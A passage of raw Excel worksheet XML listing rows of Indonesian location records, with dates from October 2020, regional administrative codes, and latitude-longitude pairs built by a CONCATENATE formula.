      <c r="S2432" t="s">
        <v>32</v>
      </c>
      <c r="T2432" t="s">
        <v>33</v>
      </c>
      <c r="U2432" s="5">
        <v>10676930</v>
      </c>
      <c r="V2432" s="5" t="s">
        <v>16623</v>
      </c>
      <c r="W2432" s="5">
        <v>-616604</v>
      </c>
      <c r="X2432" t="s">
        <v>20365</v>
      </c>
      <c r="Y2432" t="str">
        <f t="shared" si="37"/>
        <v>-6.16604,106.76930</v>
      </c>
    </row>
    <row r="2433" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2433">
        <v>215559</v>
      </c>
      <c r="B2433" s="1">
        <v>44120</v>
      </c>
      <c r="C2433" s="2">
        <v>0.57916666666666672</v>
      </c>
      <c r="D2433" t="s">
        <v>2648</v>
      </c>
      <c r="E2433" t="s">
        <v>23</v>
      </c>
      <c r="G2433" t="s">
        <v>8164</v>
      </c>
      <c r="H2433" t="s">
        <v>26</v>
      </c>
      <c r="J2433" t="s">
        <v>404</v>
      </c>
      <c r="L2433" t="s">
        <v>8165</v>
      </c>
      <c r="M2433">
        <v>3174020005</v>
      </c>
      <c r="N2433">
        <v>3174020</v>
      </c>
      <c r="O2433">
        <v>3174</v>
      </c>
      <c r="P2433">
        <v>31</v>
      </c>
      <c r="Q2433" t="s">
        <v>30</v>
      </c>
      <c r="R2433" t="s">
        <v>31</v>
      </c>
      <c r="S2433" t="s">
        <v>32</v>
      </c>
      <c r="T2433" t="s">
        <v>33</v>
      </c>
      <c r="U2433" s="5">
        <v>10677029</v>
      </c>
      <c r="V2433" s="5" t="s">
        <v>16624</v>
      </c>
      <c r="W2433" s="5">
        <v>-616641</v>
      </c>
      <c r="X2433" t="s">
        <v>20366</v>
      </c>
      <c r="Y2433" t="str">
        <f t="shared" si="37"/>
        <v>-6.16641,106.77029</v>
      </c>
    </row>
    <row r="2434" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2434">
        <v>215560</v>
      </c>
      <c r="B2434" s="1">
        <v>44120</v>
      </c>
      <c r="C2434" s="2">
        <v>0.46458333333333335</v>
      </c>
      <c r="D2434" t="s">
        <v>2648</v>
      </c>
      <c r="E2434" t="s">
        <v>23</v>
      </c>
      <c r="G2434" t="s">
        <v>8166</v>
      </c>
      <c r="H2434" t="s">
        <v>26</v>
      </c>
      <c r="J2434" t="s">
        <v>28</v>
      </c>
      <c r="L2434" t="s">
        <v>8167</v>
      </c>
      <c r="M2434">
        <v>3174020005</v>
      </c>
      <c r="N2434">
        <v>3174020</v>
      </c>
      <c r="O2434">
        <v>3174</v>
      </c>
      <c r="P2434">
        <v>31</v>
      </c>
      <c r="Q2434" t="s">
        <v>30</v>
      </c>
      <c r="R2434" t="s">
        <v>31</v>
      </c>
      <c r="S2434" t="s">
        <v>32</v>
      </c>
      <c r="T2434" t="s">
        <v>33</v>
      </c>
      <c r="U2434" s="5">
        <v>10677059</v>
      </c>
      <c r="V2434" s="5" t="s">
        <v>16625</v>
      </c>
      <c r="W2434" s="5">
        <v>-617034</v>
      </c>
      <c r="X2434" t="s">
        <v>20367</v>
      </c>
      <c r="Y2434" t="str">
        <f t="shared" si="37"/>
        <v>-6.17034,106.77059</v>
      </c>
    </row>
    <row r="2435" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2435">
        <v>215561</v>
      </c>
      <c r="B2435" s="1">
        <v>44120</v>
      </c>
      <c r="C2435" s="2">
        <v>0.57847222222222217</v>
      </c>
      <c r="D2435" t="s">
        <v>2648</v>
      </c>
      <c r="E2435" t="s">
        <v>23</v>
      </c>
      <c r="G2435" t="s">
        <v>8168</v>
      </c>
      <c r="H2435" t="s">
        <v>26</v>
      </c>
      <c r="J2435" t="s">
        <v>404</v>
      </c>
      <c r="L2435" t="s">
        <v>8169</v>
      </c>
      <c r="M2435">
        <v>3174020005</v>
      </c>
      <c r="N2435">
        <v>3174020</v>
      </c>
      <c r="O2435">
        <v>3174</v>
      </c>
      <c r="P2435">
        <v>31</v>
      </c>
      <c r="Q2435" t="s">
        <v>30</v>
      </c>
      <c r="R2435" t="s">
        <v>31</v>
      </c>
      <c r="S2435" t="s">
        <v>32</v>
      </c>
      <c r="T2435" t="s">
        <v>33</v>
      </c>
      <c r="U2435" s="5">
        <v>10677116</v>
      </c>
      <c r="V2435" s="5" t="s">
        <v>16626</v>
      </c>
      <c r="W2435" s="5">
        <v>-616534</v>
      </c>
      <c r="X2435" t="s">
        <v>20368</v>
      </c>
      <c r="Y2435" t="str">
        <f t="shared" ref="Y2435:Y2498" si="38">CONCATENATE(X2435,",",V2435)</f>
        <v>-6.16534,106.77116</v>
      </c>
    </row>
    <row r="2436" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2436">
        <v>216936</v>
      </c>
      <c r="B2436" s="1">
        <v>44121</v>
      </c>
      <c r="C2436" s="2">
        <v>0.27766203703703701</v>
      </c>
      <c r="D2436" t="s">
        <v>22</v>
      </c>
      <c r="E2436" t="s">
        <v>23</v>
      </c>
      <c r="F2436" t="s">
        <v>8170</v>
      </c>
      <c r="G2436" t="s">
        <v>8171</v>
      </c>
      <c r="H2436" t="s">
        <v>26</v>
      </c>
      <c r="I2436" t="s">
        <v>137</v>
      </c>
      <c r="J2436" t="s">
        <v>7637</v>
      </c>
      <c r="L2436" t="s">
        <v>8172</v>
      </c>
      <c r="M2436">
        <v>6202060004</v>
      </c>
      <c r="N2436">
        <v>6202060</v>
      </c>
      <c r="O2436">
        <v>6202</v>
      </c>
      <c r="P2436">
        <v>62</v>
      </c>
      <c r="Q2436" t="s">
        <v>8173</v>
      </c>
      <c r="R2436" t="s">
        <v>8174</v>
      </c>
      <c r="S2436" t="s">
        <v>7770</v>
      </c>
      <c r="T2436" t="s">
        <v>7642</v>
      </c>
      <c r="U2436" s="5">
        <v>11293368</v>
      </c>
      <c r="V2436" s="5" t="s">
        <v>16627</v>
      </c>
      <c r="W2436" s="5">
        <v>-255087</v>
      </c>
      <c r="X2436" t="s">
        <v>20369</v>
      </c>
      <c r="Y2436" t="str">
        <f t="shared" si="38"/>
        <v>-2.55087,112.93368</v>
      </c>
    </row>
    <row r="2437" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2437">
        <v>217644</v>
      </c>
      <c r="B2437" s="1">
        <v>44121</v>
      </c>
      <c r="C2437" s="2">
        <v>0.62634259259259262</v>
      </c>
      <c r="D2437" t="s">
        <v>22</v>
      </c>
      <c r="E2437" t="s">
        <v>23</v>
      </c>
      <c r="F2437" t="s">
        <v>8175</v>
      </c>
      <c r="H2437" t="s">
        <v>26</v>
      </c>
      <c r="I2437" t="s">
        <v>3275</v>
      </c>
      <c r="J2437" t="s">
        <v>8176</v>
      </c>
      <c r="L2437" t="s">
        <v>8177</v>
      </c>
      <c r="M2437">
        <v>7171040002</v>
      </c>
      <c r="N2437">
        <v>7171040</v>
      </c>
      <c r="O2437">
        <v>7171</v>
      </c>
      <c r="P2437">
        <v>71</v>
      </c>
      <c r="Q2437" t="s">
        <v>8178</v>
      </c>
      <c r="R2437" t="s">
        <v>8179</v>
      </c>
      <c r="S2437" t="s">
        <v>8180</v>
      </c>
      <c r="T2437" t="s">
        <v>8181</v>
      </c>
      <c r="U2437" s="5">
        <v>12487717</v>
      </c>
      <c r="V2437" s="5" t="s">
        <v>16628</v>
      </c>
      <c r="W2437" s="5">
        <v>150324</v>
      </c>
      <c r="X2437" t="s">
        <v>20370</v>
      </c>
      <c r="Y2437" t="str">
        <f t="shared" si="38"/>
        <v>1.50324,124.87717</v>
      </c>
    </row>
    <row r="2438" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2438">
        <v>218335</v>
      </c>
      <c r="B2438" s="1">
        <v>44121</v>
      </c>
      <c r="C2438" s="2">
        <v>0.99430555555555555</v>
      </c>
      <c r="D2438" t="s">
        <v>22</v>
      </c>
      <c r="E2438" t="s">
        <v>23</v>
      </c>
      <c r="F2438" t="s">
        <v>8182</v>
      </c>
      <c r="G2438" t="s">
        <v>8183</v>
      </c>
      <c r="H2438" t="s">
        <v>26</v>
      </c>
      <c r="I2438" t="s">
        <v>137</v>
      </c>
      <c r="J2438" t="s">
        <v>7399</v>
      </c>
      <c r="L2438" t="s">
        <v>8184</v>
      </c>
      <c r="M2438">
        <v>1473031005</v>
      </c>
      <c r="N2438">
        <v>1473031</v>
      </c>
      <c r="O2438">
        <v>1473</v>
      </c>
      <c r="P2438">
        <v>14</v>
      </c>
      <c r="Q2438" t="s">
        <v>8185</v>
      </c>
      <c r="R2438" t="s">
        <v>7938</v>
      </c>
      <c r="S2438" t="s">
        <v>7939</v>
      </c>
      <c r="T2438" t="s">
        <v>7404</v>
      </c>
      <c r="U2438" s="5">
        <v>10144081</v>
      </c>
      <c r="V2438" s="5" t="s">
        <v>16629</v>
      </c>
      <c r="W2438" s="5">
        <v>168520</v>
      </c>
      <c r="X2438" t="s">
        <v>20371</v>
      </c>
      <c r="Y2438" t="str">
        <f t="shared" si="38"/>
        <v>1.68520,101.44081</v>
      </c>
    </row>
    <row r="2439" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2439">
        <v>218408</v>
      </c>
      <c r="B2439" s="1">
        <v>44122</v>
      </c>
      <c r="C2439" s="2">
        <v>0.22500000000000001</v>
      </c>
      <c r="D2439" t="s">
        <v>2648</v>
      </c>
      <c r="E2439" t="s">
        <v>23</v>
      </c>
      <c r="G2439" t="s">
        <v>8186</v>
      </c>
      <c r="H2439" t="s">
        <v>26</v>
      </c>
      <c r="J2439" t="s">
        <v>8086</v>
      </c>
      <c r="L2439" t="s">
        <v>8187</v>
      </c>
      <c r="M2439">
        <v>3171050005</v>
      </c>
      <c r="N2439">
        <v>3171050</v>
      </c>
      <c r="O2439">
        <v>3171</v>
      </c>
      <c r="P2439">
        <v>31</v>
      </c>
      <c r="Q2439" t="s">
        <v>8057</v>
      </c>
      <c r="R2439" t="s">
        <v>508</v>
      </c>
      <c r="S2439" t="s">
        <v>108</v>
      </c>
      <c r="T2439" t="s">
        <v>33</v>
      </c>
      <c r="U2439" s="5">
        <v>10677425</v>
      </c>
      <c r="V2439" s="5" t="s">
        <v>16630</v>
      </c>
      <c r="W2439" s="5">
        <v>-622881</v>
      </c>
      <c r="X2439" t="s">
        <v>20372</v>
      </c>
      <c r="Y2439" t="str">
        <f t="shared" si="38"/>
        <v>-6.22881,106.77425</v>
      </c>
    </row>
    <row r="2440" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2440">
        <v>218409</v>
      </c>
      <c r="B2440" s="1">
        <v>44122</v>
      </c>
      <c r="C2440" s="2">
        <v>0.20277777777777781</v>
      </c>
      <c r="D2440" t="s">
        <v>2648</v>
      </c>
      <c r="E2440" t="s">
        <v>23</v>
      </c>
      <c r="G2440" t="s">
        <v>8188</v>
      </c>
      <c r="H2440" t="s">
        <v>26</v>
      </c>
      <c r="J2440" t="s">
        <v>8086</v>
      </c>
      <c r="L2440" t="s">
        <v>8189</v>
      </c>
      <c r="M2440">
        <v>3171050005</v>
      </c>
      <c r="N2440">
        <v>3171050</v>
      </c>
      <c r="O2440">
        <v>3171</v>
      </c>
      <c r="P2440">
        <v>31</v>
      </c>
      <c r="Q2440" t="s">
        <v>8057</v>
      </c>
      <c r="R2440" t="s">
        <v>508</v>
      </c>
      <c r="S2440" t="s">
        <v>108</v>
      </c>
      <c r="T2440" t="s">
        <v>33</v>
      </c>
      <c r="U2440" s="5">
        <v>10677395</v>
      </c>
      <c r="V2440" s="5" t="s">
        <v>16631</v>
      </c>
      <c r="W2440" s="5">
        <v>-622834</v>
      </c>
      <c r="X2440" t="s">
        <v>20373</v>
      </c>
      <c r="Y2440" t="str">
        <f t="shared" si="38"/>
        <v>-6.22834,106.77395</v>
      </c>
    </row>
    <row r="2441" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2441">
        <v>218884</v>
      </c>
      <c r="B2441" s="1">
        <v>44123</v>
      </c>
      <c r="C2441" s="2">
        <v>9.7280092592592585E-2</v>
      </c>
      <c r="D2441" t="s">
        <v>22</v>
      </c>
      <c r="E2441" t="s">
        <v>23</v>
      </c>
      <c r="F2441" t="s">
        <v>8190</v>
      </c>
      <c r="G2441" t="s">
        <v>8191</v>
      </c>
      <c r="H2441" t="s">
        <v>26</v>
      </c>
      <c r="I2441" t="s">
        <v>1683</v>
      </c>
      <c r="J2441" t="s">
        <v>2608</v>
      </c>
      <c r="L2441" t="s">
        <v>8192</v>
      </c>
      <c r="M2441">
        <v>3301010007</v>
      </c>
      <c r="N2441">
        <v>3301010</v>
      </c>
      <c r="O2441">
        <v>3301</v>
      </c>
      <c r="P2441">
        <v>33</v>
      </c>
      <c r="Q2441" t="s">
        <v>8193</v>
      </c>
      <c r="R2441" t="s">
        <v>8194</v>
      </c>
      <c r="S2441" t="s">
        <v>2642</v>
      </c>
      <c r="T2441" t="s">
        <v>1134</v>
      </c>
      <c r="U2441" s="5">
        <v>10861990</v>
      </c>
      <c r="V2441" s="5" t="s">
        <v>16632</v>
      </c>
      <c r="W2441" s="5">
        <v>-723074</v>
      </c>
      <c r="X2441" t="s">
        <v>20374</v>
      </c>
      <c r="Y2441" t="str">
        <f t="shared" si="38"/>
        <v>-7.23074,108.61990</v>
      </c>
    </row>
    <row r="2442" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2442">
        <v>218945</v>
      </c>
      <c r="B2442" s="1">
        <v>44123</v>
      </c>
      <c r="C2442" s="2">
        <v>0.19721064814814815</v>
      </c>
      <c r="D2442" t="s">
        <v>22</v>
      </c>
      <c r="E2442" t="s">
        <v>23</v>
      </c>
      <c r="F2442" t="s">
        <v>8195</v>
      </c>
      <c r="G2442" t="s">
        <v>8196</v>
      </c>
      <c r="H2442" t="s">
        <v>26</v>
      </c>
      <c r="I2442" t="s">
        <v>2139</v>
      </c>
      <c r="J2442" t="s">
        <v>7304</v>
      </c>
      <c r="L2442" t="s">
        <v>8197</v>
      </c>
      <c r="M2442">
        <v>3175010005</v>
      </c>
      <c r="N2442">
        <v>3175010</v>
      </c>
      <c r="O2442">
        <v>3175</v>
      </c>
      <c r="P2442">
        <v>31</v>
      </c>
      <c r="Q2442" t="s">
        <v>1686</v>
      </c>
      <c r="R2442" t="s">
        <v>546</v>
      </c>
      <c r="S2442" t="s">
        <v>547</v>
      </c>
      <c r="T2442" t="s">
        <v>33</v>
      </c>
      <c r="U2442" s="5">
        <v>10676826</v>
      </c>
      <c r="V2442" s="5" t="s">
        <v>16633</v>
      </c>
      <c r="W2442" s="5">
        <v>-610386</v>
      </c>
      <c r="X2442" t="s">
        <v>20375</v>
      </c>
      <c r="Y2442" t="str">
        <f t="shared" si="38"/>
        <v>-6.10386,106.76826</v>
      </c>
    </row>
    <row r="2443" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2443">
        <v>218986</v>
      </c>
      <c r="B2443" s="1">
        <v>44123</v>
      </c>
      <c r="C2443" s="2">
        <v>0.26597222222222222</v>
      </c>
      <c r="D2443" t="s">
        <v>2648</v>
      </c>
      <c r="E2443" t="s">
        <v>23</v>
      </c>
      <c r="G2443" t="s">
        <v>8198</v>
      </c>
      <c r="H2443" t="s">
        <v>26</v>
      </c>
      <c r="J2443" t="s">
        <v>8199</v>
      </c>
      <c r="L2443" t="s">
        <v>8200</v>
      </c>
      <c r="Y2443" t="str">
        <f t="shared" si="38"/>
        <v>,</v>
      </c>
    </row>
    <row r="2444" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2444">
        <v>219098</v>
      </c>
      <c r="B2444" s="1">
        <v>44123</v>
      </c>
      <c r="C2444" s="2">
        <v>0.44307870370370367</v>
      </c>
      <c r="D2444" t="s">
        <v>22</v>
      </c>
      <c r="E2444" t="s">
        <v>23</v>
      </c>
      <c r="F2444" t="s">
        <v>8201</v>
      </c>
      <c r="G2444" t="s">
        <v>8202</v>
      </c>
      <c r="H2444" t="s">
        <v>26</v>
      </c>
      <c r="I2444" t="s">
        <v>137</v>
      </c>
      <c r="J2444" t="s">
        <v>7178</v>
      </c>
      <c r="L2444" t="s">
        <v>8203</v>
      </c>
      <c r="M2444">
        <v>1871041001</v>
      </c>
      <c r="N2444">
        <v>1871041</v>
      </c>
      <c r="O2444">
        <v>1871</v>
      </c>
      <c r="P2444">
        <v>18</v>
      </c>
      <c r="Q2444" t="s">
        <v>8204</v>
      </c>
      <c r="R2444" t="s">
        <v>8205</v>
      </c>
      <c r="S2444" t="s">
        <v>7181</v>
      </c>
      <c r="T2444" t="s">
        <v>2082</v>
      </c>
      <c r="U2444" s="5">
        <v>10527781</v>
      </c>
      <c r="V2444" s="5" t="s">
        <v>16634</v>
      </c>
      <c r="W2444" s="5">
        <v>-542890</v>
      </c>
      <c r="X2444" t="s">
        <v>20376</v>
      </c>
      <c r="Y2444" t="str">
        <f t="shared" si="38"/>
        <v>-5.42890,105.27781</v>
      </c>
    </row>
    <row r="2445" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2445">
        <v>219255</v>
      </c>
      <c r="B2445" s="1">
        <v>44124</v>
      </c>
      <c r="C2445" s="2">
        <v>0.49444444444444446</v>
      </c>
      <c r="D2445" t="s">
        <v>2648</v>
      </c>
      <c r="E2445" t="s">
        <v>23</v>
      </c>
      <c r="G2445" t="s">
        <v>8206</v>
      </c>
      <c r="H2445" t="s">
        <v>26</v>
      </c>
      <c r="J2445" t="s">
        <v>3376</v>
      </c>
      <c r="L2445" t="s">
        <v>8207</v>
      </c>
      <c r="M2445">
        <v>3172080001</v>
      </c>
      <c r="N2445">
        <v>3172080</v>
      </c>
      <c r="O2445">
        <v>3172</v>
      </c>
      <c r="P2445">
        <v>31</v>
      </c>
      <c r="Q2445" t="s">
        <v>48</v>
      </c>
      <c r="R2445" t="s">
        <v>141</v>
      </c>
      <c r="S2445" t="s">
        <v>49</v>
      </c>
      <c r="T2445" t="s">
        <v>33</v>
      </c>
      <c r="U2445" s="5">
        <v>10692398</v>
      </c>
      <c r="V2445" s="5" t="s">
        <v>16635</v>
      </c>
      <c r="W2445" s="5">
        <v>-620206</v>
      </c>
      <c r="X2445" t="s">
        <v>19086</v>
      </c>
      <c r="Y2445" t="str">
        <f t="shared" si="38"/>
        <v>-6.20206,106.92398</v>
      </c>
    </row>
    <row r="2446" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2446">
        <v>219278</v>
      </c>
      <c r="B2446" s="1">
        <v>44124</v>
      </c>
      <c r="C2446" s="2">
        <v>0.52874999999999994</v>
      </c>
      <c r="D2446" t="s">
        <v>85</v>
      </c>
      <c r="E2446" t="s">
        <v>23</v>
      </c>
      <c r="F2446" t="s">
        <v>8208</v>
      </c>
      <c r="G2446" t="s">
        <v>8209</v>
      </c>
      <c r="H2446" t="s">
        <v>26</v>
      </c>
      <c r="J2446" t="s">
        <v>2627</v>
      </c>
      <c r="K2446" t="s">
        <v>8210</v>
      </c>
      <c r="L2446" t="s">
        <v>8211</v>
      </c>
      <c r="M2446">
        <v>3211010009</v>
      </c>
      <c r="N2446">
        <v>3211010</v>
      </c>
      <c r="O2446">
        <v>3211</v>
      </c>
      <c r="P2446">
        <v>32</v>
      </c>
      <c r="Q2446" t="s">
        <v>2951</v>
      </c>
      <c r="R2446" t="s">
        <v>2952</v>
      </c>
      <c r="S2446" t="s">
        <v>1797</v>
      </c>
      <c r="T2446" t="s">
        <v>42</v>
      </c>
      <c r="U2446" s="5">
        <v>10777349</v>
      </c>
      <c r="V2446" s="5" t="s">
        <v>16636</v>
      </c>
      <c r="W2446" s="5">
        <v>-693421</v>
      </c>
      <c r="X2446" t="s">
        <v>20377</v>
      </c>
      <c r="Y2446" t="str">
        <f t="shared" si="38"/>
        <v>-6.93421,107.77349</v>
      </c>
    </row>
    <row r="2447" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2447">
        <v>219689</v>
      </c>
      <c r="B2447" s="1">
        <v>44128</v>
      </c>
      <c r="C2447" s="2">
        <v>0.53694444444444445</v>
      </c>
      <c r="D2447" t="s">
        <v>85</v>
      </c>
      <c r="E2447" t="s">
        <v>23</v>
      </c>
      <c r="F2447" t="s">
        <v>8212</v>
      </c>
      <c r="G2447" t="s">
        <v>8213</v>
      </c>
      <c r="H2447" t="s">
        <v>26</v>
      </c>
      <c r="J2447" t="s">
        <v>2627</v>
      </c>
      <c r="K2447" t="s">
        <v>8214</v>
      </c>
      <c r="L2447" t="s">
        <v>8215</v>
      </c>
      <c r="M2447">
        <v>3211010009</v>
      </c>
      <c r="N2447">
        <v>3211010</v>
      </c>
      <c r="O2447">
        <v>3211</v>
      </c>
      <c r="P2447">
        <v>32</v>
      </c>
      <c r="Q2447" t="s">
        <v>2951</v>
      </c>
      <c r="R2447" t="s">
        <v>2952</v>
      </c>
      <c r="S2447" t="s">
        <v>1797</v>
      </c>
      <c r="T2447" t="s">
        <v>42</v>
      </c>
      <c r="U2447" s="5">
        <v>10777660</v>
      </c>
      <c r="V2447" s="5" t="s">
        <v>16637</v>
      </c>
      <c r="W2447" s="5">
        <v>-694321</v>
      </c>
      <c r="X2447" t="s">
        <v>20378</v>
      </c>
      <c r="Y2447" t="str">
        <f t="shared" si="38"/>
        <v>-6.94321,107.77660</v>
      </c>
    </row>
    <row r="2448" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2448">
        <v>219691</v>
      </c>
      <c r="B2448" s="1">
        <v>44128</v>
      </c>
      <c r="C2448" s="2">
        <v>0.6980439814814815</v>
      </c>
      <c r="D2448" t="s">
        <v>22</v>
      </c>
      <c r="E2448" t="s">
        <v>23</v>
      </c>
      <c r="F2448" t="s">
        <v>8216</v>
      </c>
      <c r="G2448" t="s">
        <v>8217</v>
      </c>
      <c r="H2448" t="s">
        <v>26</v>
      </c>
      <c r="I2448" t="s">
        <v>131</v>
      </c>
      <c r="J2448" t="s">
        <v>2627</v>
      </c>
      <c r="L2448" t="s">
        <v>8218</v>
      </c>
      <c r="M2448">
        <v>3201190010</v>
      </c>
      <c r="N2448">
        <v>3201190</v>
      </c>
      <c r="O2448">
        <v>3201</v>
      </c>
      <c r="P2448">
        <v>32</v>
      </c>
      <c r="Q2448" t="s">
        <v>419</v>
      </c>
      <c r="R2448" t="s">
        <v>420</v>
      </c>
      <c r="S2448" t="s">
        <v>421</v>
      </c>
      <c r="T2448" t="s">
        <v>42</v>
      </c>
      <c r="U2448" s="5">
        <v>10697228</v>
      </c>
      <c r="V2448" s="5" t="s">
        <v>16638</v>
      </c>
      <c r="W2448" s="5">
        <v>-632012</v>
      </c>
      <c r="X2448" t="s">
        <v>20379</v>
      </c>
      <c r="Y2448" t="str">
        <f t="shared" si="38"/>
        <v>-6.32012,106.97228</v>
      </c>
    </row>
    <row r="2449" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2449">
        <v>219692</v>
      </c>
      <c r="B2449" s="1">
        <v>44128</v>
      </c>
      <c r="C2449" s="2">
        <v>0.74709490740740747</v>
      </c>
      <c r="D2449" t="s">
        <v>22</v>
      </c>
      <c r="E2449" t="s">
        <v>23</v>
      </c>
      <c r="F2449" t="s">
        <v>8219</v>
      </c>
      <c r="H2449" t="s">
        <v>26</v>
      </c>
      <c r="I2449" t="s">
        <v>277</v>
      </c>
      <c r="J2449" t="s">
        <v>2627</v>
      </c>
      <c r="L2449" t="s">
        <v>8220</v>
      </c>
      <c r="M2449">
        <v>3201190010</v>
      </c>
      <c r="N2449">
        <v>3201190</v>
      </c>
      <c r="O2449">
        <v>3201</v>
      </c>
      <c r="P2449">
        <v>32</v>
      </c>
      <c r="Q2449" t="s">
        <v>419</v>
      </c>
      <c r="R2449" t="s">
        <v>420</v>
      </c>
      <c r="S2449" t="s">
        <v>421</v>
      </c>
      <c r="T2449" t="s">
        <v>42</v>
      </c>
      <c r="U2449" s="5">
        <v>10697730</v>
      </c>
      <c r="V2449" s="5" t="s">
        <v>16639</v>
      </c>
      <c r="W2449" s="5">
        <v>-631518</v>
      </c>
      <c r="X2449" t="s">
        <v>20380</v>
      </c>
      <c r="Y2449" t="str">
        <f t="shared" si="38"/>
        <v>-6.31518,106.97730</v>
      </c>
    </row>
    <row r="2450" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2450">
        <v>219693</v>
      </c>
      <c r="B2450" s="1">
        <v>44128</v>
      </c>
      <c r="C2450" s="2">
        <v>0.76701388888888899</v>
      </c>
      <c r="D2450" t="s">
        <v>22</v>
      </c>
      <c r="E2450" t="s">
        <v>23</v>
      </c>
      <c r="F2450" t="s">
        <v>8221</v>
      </c>
      <c r="G2450" t="s">
        <v>8222</v>
      </c>
      <c r="H2450" t="s">
        <v>26</v>
      </c>
      <c r="I2450" t="s">
        <v>2188</v>
      </c>
      <c r="J2450" t="s">
        <v>2627</v>
      </c>
      <c r="L2450" t="s">
        <v>8223</v>
      </c>
      <c r="M2450">
        <v>3275020003</v>
      </c>
      <c r="N2450">
        <v>3275020</v>
      </c>
      <c r="O2450">
        <v>3275</v>
      </c>
      <c r="P2450">
        <v>32</v>
      </c>
      <c r="Q2450" t="s">
        <v>4738</v>
      </c>
      <c r="R2450" t="s">
        <v>828</v>
      </c>
      <c r="S2450" t="s">
        <v>41</v>
      </c>
      <c r="T2450" t="s">
        <v>42</v>
      </c>
      <c r="U2450" s="5">
        <v>10696999</v>
      </c>
      <c r="V2450" s="5" t="s">
        <v>16640</v>
      </c>
      <c r="W2450" s="5">
        <v>-630527</v>
      </c>
      <c r="X2450" t="s">
        <v>20381</v>
      </c>
      <c r="Y2450" t="str">
        <f t="shared" si="38"/>
        <v>-6.30527,106.96999</v>
      </c>
    </row>
    <row r="2451" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2451">
        <v>219694</v>
      </c>
      <c r="B2451" s="1">
        <v>44128</v>
      </c>
      <c r="C2451" s="2">
        <v>0.79063657407407406</v>
      </c>
      <c r="D2451" t="s">
        <v>22</v>
      </c>
      <c r="E2451" t="s">
        <v>23</v>
      </c>
      <c r="F2451" t="s">
        <v>8224</v>
      </c>
      <c r="H2451" t="s">
        <v>26</v>
      </c>
      <c r="I2451" t="s">
        <v>1046</v>
      </c>
      <c r="J2451" t="s">
        <v>2627</v>
      </c>
      <c r="L2451" t="s">
        <v>8225</v>
      </c>
      <c r="M2451">
        <v>3275020003</v>
      </c>
      <c r="N2451">
        <v>3275020</v>
      </c>
      <c r="O2451">
        <v>3275</v>
      </c>
      <c r="P2451">
        <v>32</v>
      </c>
      <c r="Q2451" t="s">
        <v>4738</v>
      </c>
      <c r="R2451" t="s">
        <v>828</v>
      </c>
      <c r="S2451" t="s">
        <v>41</v>
      </c>
      <c r="T2451" t="s">
        <v>42</v>
      </c>
      <c r="U2451" s="5">
        <v>10697435</v>
      </c>
      <c r="V2451" s="5" t="s">
        <v>16641</v>
      </c>
      <c r="W2451" s="5">
        <v>-628380</v>
      </c>
      <c r="X2451" t="s">
        <v>20382</v>
      </c>
      <c r="Y2451" t="str">
        <f t="shared" si="38"/>
        <v>-6.28380,106.97435</v>
      </c>
    </row>
    <row r="2452" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2452">
        <v>219695</v>
      </c>
      <c r="B2452" s="1">
        <v>44128</v>
      </c>
      <c r="C2452" s="2">
        <v>0.92450231481481471</v>
      </c>
      <c r="D2452" t="s">
        <v>22</v>
      </c>
      <c r="E2452" t="s">
        <v>23</v>
      </c>
      <c r="F2452" t="s">
        <v>8226</v>
      </c>
      <c r="H2452" t="s">
        <v>26</v>
      </c>
      <c r="I2452" t="s">
        <v>893</v>
      </c>
      <c r="J2452" t="s">
        <v>2627</v>
      </c>
      <c r="L2452" t="s">
        <v>8227</v>
      </c>
      <c r="M2452">
        <v>3216090002</v>
      </c>
      <c r="N2452">
        <v>3216090</v>
      </c>
      <c r="O2452">
        <v>3216</v>
      </c>
      <c r="P2452">
        <v>32</v>
      </c>
      <c r="Q2452" t="s">
        <v>6142</v>
      </c>
      <c r="R2452" t="s">
        <v>335</v>
      </c>
      <c r="S2452" t="s">
        <v>41</v>
      </c>
      <c r="T2452" t="s">
        <v>42</v>
      </c>
      <c r="U2452" s="5">
        <v>10704382</v>
      </c>
      <c r="V2452" s="5" t="s">
        <v>16642</v>
      </c>
      <c r="W2452" s="5">
        <v>-617555</v>
      </c>
      <c r="X2452" t="s">
        <v>20383</v>
      </c>
      <c r="Y2452" t="str">
        <f t="shared" si="38"/>
        <v>-6.17555,107.04382</v>
      </c>
    </row>
    <row r="2453" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2453">
        <v>219698</v>
      </c>
      <c r="B2453" s="1">
        <v>44129</v>
      </c>
      <c r="C2453" s="2">
        <v>6.3796296296296295E-2</v>
      </c>
      <c r="D2453" t="s">
        <v>85</v>
      </c>
      <c r="E2453" t="s">
        <v>23</v>
      </c>
      <c r="F2453" t="s">
        <v>8228</v>
      </c>
      <c r="G2453" t="s">
        <v>8229</v>
      </c>
      <c r="H2453" t="s">
        <v>26</v>
      </c>
      <c r="J2453" t="s">
        <v>306</v>
      </c>
      <c r="K2453" t="s">
        <v>8230</v>
      </c>
      <c r="L2453" t="s">
        <v>8231</v>
      </c>
      <c r="M2453">
        <v>3172060001</v>
      </c>
      <c r="N2453">
        <v>3172060</v>
      </c>
      <c r="O2453">
        <v>3172</v>
      </c>
      <c r="P2453">
        <v>31</v>
      </c>
      <c r="Q2453" t="s">
        <v>309</v>
      </c>
      <c r="R2453" t="s">
        <v>48</v>
      </c>
      <c r="S2453" t="s">
        <v>49</v>
      </c>
      <c r="T2453" t="s">
        <v>33</v>
      </c>
      <c r="U2453" s="5">
        <v>10686714</v>
      </c>
      <c r="V2453" s="5" t="s">
        <v>16643</v>
      </c>
      <c r="W2453" s="5">
        <v>-623850</v>
      </c>
      <c r="X2453" t="s">
        <v>18395</v>
      </c>
